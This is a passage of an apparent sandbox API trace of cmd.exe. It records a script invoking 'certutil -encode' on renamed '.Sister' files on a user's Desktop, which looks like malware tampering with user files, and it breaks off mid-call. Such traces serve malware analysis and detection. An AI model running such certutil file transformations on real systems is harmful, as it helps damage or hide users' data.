_wcsicmp (_String1="certutil", _String2="START") returned -16 [0255.457] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0255.457] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0255.457] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0255.457] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0255.457] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0255.457] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0255.457] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0255.457] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0255.457] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0255.457] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0255.457] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0255.457] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0255.457] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0255.457] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0255.457] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0255.457] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0255.457] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0255.457] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0255.458] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0255.458] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0255.458] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0255.458] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0255.458] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0255.458] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0255.458] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0255.458] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0255.458] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0255.458] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0255.458] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0255.458] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0255.458] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0255.458] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0255.458] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0255.458] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0255.458] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0255.458] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0255.458] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0255.458] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0255.458] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0255.458] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0255.458] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0255.458] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0255.458] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0255.458] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0255.459] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0255.459] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0255.459] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0255.459] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0255.459] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0255.459] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0255.459] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0255.459] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0255.459] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0255.459] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0255.459] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0255.459] ??_V@YAXPEAX@Z () returned 0x1 [0255.459] GetProcessHeap () returned 0x21ed8c70000 [0255.459] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9361560 [0255.459] GetProcessHeap () returned 0x21ed8c70000 [0255.459] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96ac0 [0255.459] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0255.460] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0255.460] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0255.460] GetProcessHeap () returned 0x21ed8c70000 [0255.460] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93b0cf0 [0255.460] SetErrorMode (uMode=0x0) returned 0x0 [0255.460] SetErrorMode (uMode=0x1) returned 0x0 [0255.460] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93b0d00, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0255.460] SetErrorMode (uMode=0x0) returned 0x1 [0255.460] GetProcessHeap () returned 0x21ed8c70000 [0255.460] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0cf0, Size=0x52) returned 0x21ed93b0cf0 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0cf0) returned 0x52 [0255.461] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0255.461] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937c590 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8cc8070 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc8070, Size=0x1be) returned 0x21ed8cc8070 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc8070) returned 0x1be [0255.461] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980a20 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980a20, Size=0x7e) returned 0x21ed9980a20 [0255.461] GetProcessHeap () returned 0x21ed8c70000 [0255.461] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980a20) returned 0x7e [0255.462] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.462] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0255.462] GetLastError () returned 0x2 [0255.462] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.462] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0255.463] GetLastError () returned 0x2 [0255.463] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0255.463] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0255.463] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0255.463] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0255.463] GetLastError () returned 0x2 [0255.463] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0255.463] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0255.464] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0255.464] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0255.464] ??_V@YAXPEAX@Z () returned 0x1 [0255.464] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0255.474] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0255.474] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0255.475] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0255.475] GetProcessHeap () returned 0x21ed8c70000 [0255.475] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0255.475] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0255.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0255.477] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0255.477] GetProcessHeap () returned 0x21ed8c70000 [0255.477] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0255.477] GetProcessHeap () returned 0x21ed8c70000 [0255.477] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95840 [0255.478] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0255.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0255.478] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0255.478] _get_osfhandle (_FileHandle=0) returned 0x4c [0255.478] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0255.479] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"t2RoafwhrVeC_4Hu.gif.Sister\" \"t2RoafwhrVeC_4Hu.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf84, dwThreadId=0xf80)) returned 1 [0255.491] CloseHandle (hObject=0xa4) returned 1 [0255.491] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0255.491] GetProcessHeap () returned 0x21ed8c70000 [0255.491] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0255.491] GetEnvironmentStringsW () returned 0x21ed8d44660* [0255.492] GetProcessHeap () returned 0x21ed8c70000 [0255.492] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0255.492] FreeEnvironmentStringsA (penv="=") returned 1 [0255.495] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0257.299] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0257.299] CloseHandle (hObject=0xa8) returned 1 [0257.299] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0257.299] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0257.299] GetProcessHeap () returned 0x21ed8c70000 [0257.299] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0257.299] GetEnvironmentStringsW () returned 0x21ed8d44660* [0257.300] GetProcessHeap () returned 0x21ed8c70000 [0257.300] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0257.300] FreeEnvironmentStringsA (penv="=") returned 1 [0257.300] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0257.300] GetProcessHeap () returned 0x21ed8c70000 [0257.300] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0257.300] GetEnvironmentStringsW () returned 0x21ed8d44660* [0257.300] GetProcessHeap () returned 0x21ed8c70000 [0257.300] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d603e0 [0257.300] FreeEnvironmentStringsA (penv="=") returned 1 [0257.300] GetProcessHeap () returned 0x21ed8c70000 [0257.300] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95840) returned 1 [0257.300] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0257.300] ??_V@YAXPEAX@Z () returned 0x1 [0257.300] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="vkmlI37o0H7OT_ Ymw.bmp.Sister", cAlternateFileName="")) returned 1 [0257.300] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0130, Size=0x584) returned 0x21ed93b0130 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0130) returned 0x584 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a950 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a950, Size=0x58) returned 0x21ed8d6a950 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a950) returned 0x58 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6a9c0 [0257.301] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0257.301] GetProcessHeap () returned 0x21ed8c70000 [0257.301] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cee0 [0257.301] ??_V@YAXPEAX@Z () returned 0x1 [0257.301] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0257.301] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0257.302] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0257.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce20 [0257.336] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0257.337] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc39965b6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc39965b6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0257.337] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0257.337] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vkmlI37o0H7OT_ Ymw.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="vkmlI37o0H7OT_ Ymw.bmp.Sister", cAlternateFileName="VKMLI3~1.SIS")) returned 0x21ed8c7cdc0 [0257.337] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0257.337] _wcsnicmp (_String1="VKMLI3~1.SIS", _String2="vkmlI37o0H7OT_ Ymw.bmp.Sister", _MaxCount=0x1d) returned 71 [0257.338] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0257.338] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0257.338] GetProcessHeap () returned 0x21ed8c70000 [0257.338] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8cc7330 [0257.338] ??_V@YAXPEAX@Z () returned 0x1 [0257.338] ??_V@YAXPEAX@Z () returned 0x1 [0257.338] GetProcessHeap () returned 0x21ed8c70000 [0257.338] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6a9c0, Size=0x250) returned 0x21ed8d6a9c0 [0257.338] GetProcessHeap () returned 0x21ed8c70000 [0257.338] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6a9c0) returned 0x250 [0257.338] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0257.338] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.338] GetFileType (hFile=0x50) returned 0x2 [0257.338] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0257.338] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0257.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.445] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0257.521] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0257.521] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0257.521] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0257.521] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0257.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.521] GetFileType (hFile=0x50) returned 0x2 [0257.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0257.522] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0257.593] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.593] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0257.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.704] GetFileType (hFile=0x50) returned 0x2 [0257.704] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0257.704] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0257.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0257.783] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6a960*, nNumberOfCharsToWrite=0x8, 